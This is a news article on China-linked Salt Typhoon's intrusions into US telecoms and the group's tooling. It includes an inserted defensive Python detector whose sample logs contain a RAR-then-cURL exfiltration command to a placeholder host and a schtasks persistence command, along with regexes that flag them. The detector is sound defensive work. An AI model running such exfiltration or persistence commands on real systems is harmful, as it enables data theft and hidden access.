Chinese hackers are exploiting T-Mobile and other US telecoms as part of a wider espionage campaign
American telecommunications giant T-Mobile has confirmed that it was also among the companies that were targeted by Chinese threat actors to gain access to valuable information.

The adversary, tracked as Salt Typhoon, breached the company as part of a “month-long campaign” to harvest the cellphone communications of “high-value intelligence targets.” It is unclear what, if any, information was taken during the malicious activity.

“T-Mobile is closely monitoring this industry-wide attack, and at this time, T-Mobile’s systems and data have not been significantly affected, and we have no evidence of impact to customer information,” a company spokesperson was quoted as telling The Wall Street Journal. “We will continue to monitor this closely, working with industry colleagues and the relevant authorities.”

With the latest development, T-Mobile has joined a list of major organizations like AT&T, Verizon and Lumen Technologies that have been singled out as part of what appears to be a full-on cyber espionage campaign.

So far, the reports have not mentioned the degree to which these attacks were successful, whether any malware was installed, or what kind of information the attackers were looking for. Salt Typhoon’s unauthorized access to Americans’ cellular data records was previously disclosed by Politico.

Last week, the US government said its ongoing investigation into the targeting of commercial telecommunications infrastructure revealed a “broad and significant” hack orchestrated by the People’s Republic of China (PRC).

“PRC-affiliated actors have compromised the networks of several telecommunications companies to allow the theft of customer call record data, the compromise of the private communications of a limited number of individuals primarily involved in government or political activities, and the copying of certain information that has been subject to US law enforcement requests pursuant to court orders,” it said.

It also warned that the scale and scope of those compromises could increase as the probe continues.

Salt Typhoon, also known as Earth Estries, FamousSparrow, GhostEmperor and UNC2286, is said to have been active since 2020, according to Trend Micro. In August 2023, the espionage crew was linked to a series of attacks targeting government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany and the US.

The analysis shows that threat actors methodically crafted their payloads and used an interesting mix of legitimate and custom tools and techniques to bypass defenses and maintain access to their targets.

“Earth Estries maintains persistence by continuously updating its tools and uses backdoors for lateral movement and credential theft,” Trend Micro researchers Ted Lee, Leon M Chang, and Lenart Bermejo said in an exhaustive analysis published earlier this month.

“Data collection and exfiltration is done using TrillClient, while tools like cURL are used to send information to anonymized file sharing services, using proxies to hide traffic behind.”

The cybersecurity company said it observed two distinct attack chains used by the group, indicating that the tradecraft in Salt Typhoon’s arsenal is as vast as it is varied. Initial access to target networks is facilitated by exploiting vulnerabilities in external services or remote management utilities.

In one set of attacks, the threat actor was found to take advantage of vulnerable or misconfigured QConvergeConsole installations to deliver malware such as Cobalt Strike, a Go-based custom stealer called TrillClient, and backdoors such as HemiGate and Crowdoor, a variant of SparrowDoor that was previously used by another China-linked group called Tropic Trooper.

Some of the other techniques include using PsExec to install its backdoors and tools laterally, and TrillClient to collect user credentials from web browser user profiles and exfiltrate them to an attacker-controlled Gmail account via the Simple Mail Transfer Protocol (SMTP) to further its objectives.

The second infection sequence, on the other hand, is much more sophisticated, with threat actors abusing susceptible Microsoft Exchange servers to implant the China Chopper web shell, which is then used to deliver Cobalt Strike, Zingdoor, and Snappybee (aka Deed RAT), a suspected successor to the ShadowPad malware.

“Delivery of these additional backdoors and tools is done either through a command-and-control (C2) server or by using cURL to download them from attacker-controlled servers,” the researchers said. “These backdoor installations are also periodically replaced and updated.”

“Collection of documents of interest is done via RAR and exfiltrated using cURL, with data sent to anonymized file sharing services.”

Programs such as NinjaCopy for extracting credentials and PortScan for network discovery and mapping are also used in the attacks. Persistence on the host is achieved through scheduled tasks.
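As an added defender-side example (not code from the article or from Trend Micro's report), the following Python correlates constructed process-creation log lines for the collection-then-exfiltration chain described above: a RAR archive created on a host followed within a short window by a cURL upload, with severity raised when cURL is pointed at a proxy or a scheduled task is created on the same host. The log format, hostnames, paths and URLs are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of process-creation events: (host, ISO timestamp, command line).
SAMPLE_EVENTS = [
    ("WS-12", "2024-11-01T09:00:05", r"C:\Tools\rar.exe a -hp C:\Users\Public\out.rar C:\Users\bob\Documents"),
    ("WS-12", "2024-11-01T09:03:40", r"curl.exe -x http://10.0.0.8:8080 -F file=@C:\Users\Public\out.rar https://files.example/upload"),
    ("WS-12", "2024-11-01T09:05:00", r"schtasks.exe /create /tn Updater /tr C:\Users\Public\svc.exe /sc minute"),
    ("WS-07", "2024-11-01T10:10:00", r"curl.exe -o C:\tmp\installer.msi https://vendor.example/installer.msi"),
    ("WS-07", "2024-11-01T12:00:00", r"rar.exe a backup.rar C:\Projects"),
]

ARCHIVE_RE = re.compile(r"\b(win)?rar\.exe\s+a\b", re.I)          # RAR "add to archive"
# cURL upload switches are case-sensitive (-F is a form upload, -f is --fail), so only the
# binary name is matched case-insensitively.
UPLOAD_RE = re.compile(r"\b(?i:curl(\.exe)?)\b.*\s(-T|-F|--upload-file|--data-binary)\s")
PROXY_RE = re.compile(r"\s(-x|--proxy)\s")                        # -X would be the HTTP method
TASK_RE = re.compile(r"\bschtasks(\.exe)?\s+/create\b", re.I)     # scheduled-task persistence

def find_exfil_chains(events, window_minutes=30):
    """Return one alert per cURL upload that follows a RAR archive creation on the
    same host within window_minutes; proxy use and schtasks raise the severity."""
    by_host = defaultdict(list)
    for host, ts, cmd in events:
        by_host[host].append((datetime.fromisoformat(ts), cmd))
    alerts = []
    for host, evs in by_host.items():
        evs.sort()
        archive_times = [t for t, c in evs if ARCHIVE_RE.search(c)]
        persistence = any(TASK_RE.search(c) for _, c in evs)
        for t_up, cmd in evs:
            if not UPLOAD_RE.search(cmd):
                continue
            window = timedelta(minutes=window_minutes)
            if not any(timedelta(0) <= t_up - t_ar <= window for t_ar in archive_times):
                continue
            severity = "medium"
            if PROXY_RE.search(cmd):
                severity = "high"        # upload routed through a proxy, as the report describes
            if persistence:
                severity = "critical"    # same host also set up a scheduled task
            alerts.append({"host": host, "time": t_up.isoformat(), "severity": severity})
    return alerts

if __name__ == "__main__":
    for alert in find_exfil_chains(SAMPLE_EVENTS):
        print(alert)
```

A plain `curl -o` download, as on WS-07, is not flagged; only uploads that follow an archive creation are.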

In one case, Salt Typhoon is believed to have reused the victim’s proxy server to redirect traffic to the command and control (C2) server in an attempt to hide the malicious traffic.

Trend Micro noted that one of the infected machines also harbors two additional backdoors called Cryptmerlin, which executes additional commands issued by a C2 server, and FuxosDoor, an Internet Information Services (IIS) implant that is deployed on a compromised Exchange server and is also designed to run commands using cmd.exe.

“Our analysis of Earth Estries’ persistent TTPs in protracted cyber operations reveals a sophisticated and adaptable threat actor using various tools and backdoors, demonstrating not only technical capabilities but also a strategic approach to maintaining access and control in compromised environments,” the researchers said.

“Throughout their campaigns, Earth Estries has demonstrated a deep understanding of their target environments, continuously identifying exposed layers for reentry. Using a combination of established tools and custom backdoors, they have created a multi-layered attack strategy that is difficult to detect and mitigate.”